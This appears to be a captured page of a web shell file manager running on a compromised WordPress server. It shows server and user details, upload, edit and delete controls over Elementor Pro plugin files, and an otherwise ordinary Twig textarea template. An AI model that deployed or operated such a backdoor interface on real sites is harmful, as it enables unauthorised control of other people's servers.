[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
modules
/
atomic-form
/
textarea
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 textarea.html.twig
1,583 B
SET
[ EDIT ]
|
[ DEL ]
📄 textarea.php
5,651 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: textarea.html.twig
{% set classes = settings.classes | merge( [ base_styles.base ] ) | join(' ') | trim %} {% set id_attribute = settings._cssid is not empty ? 'id=' ~ settings._cssid | e('html_attr') : '' %} {% set interactions_attribute = interactions is not empty ? 'data-interactions=' ~ interactions | json_encode | e('html_attr') : '' %} {% set placeholder_attribute = settings.placeholder is not empty ? 'placeholder=' ~ settings.placeholder | e('html_attr') : '' %} {% set required_attribute = settings.required ? 'required' : '' %} {% set readonly_attribute = settings.readonly ? 'readonly' : '' %} {% set rows_attribute = settings.rows is not empty ? 'rows=' ~ settings.rows | e('html_attr') : '' %} {% set minlength_attribute = settings.minlength is not empty ? 'minlength=' ~ settings.minlength | e('html_attr') : '' %} {% set maxlength_attribute = settings.maxlength is not empty ? 'maxlength=' ~ settings.maxlength | e('html_attr') : '' %} {% set resizable_attribute = settings.resizable ? 'data-resizable' : '' %} {% set name = settings.name is not empty ? settings.name : settings._cssid is not empty ? settings._cssid : id %} {% set name_attribute = 'name=' ~ name | e('html_attr') %} <textarea {{ id_attribute }} {{ name_attribute }} class="{{ classes }}" data-interaction-id="{{ interaction_id | default(id) }}" {{ settings.attributes | raw }} {{ interactions_attribute }} {{ placeholder_attribute | raw }} {{ required_attribute }} {{ readonly_attribute }} {{ rows_attribute }} {{ minlength_attribute }} {{ maxlength_attribute }} {{ resizable_attribute }} ></textarea>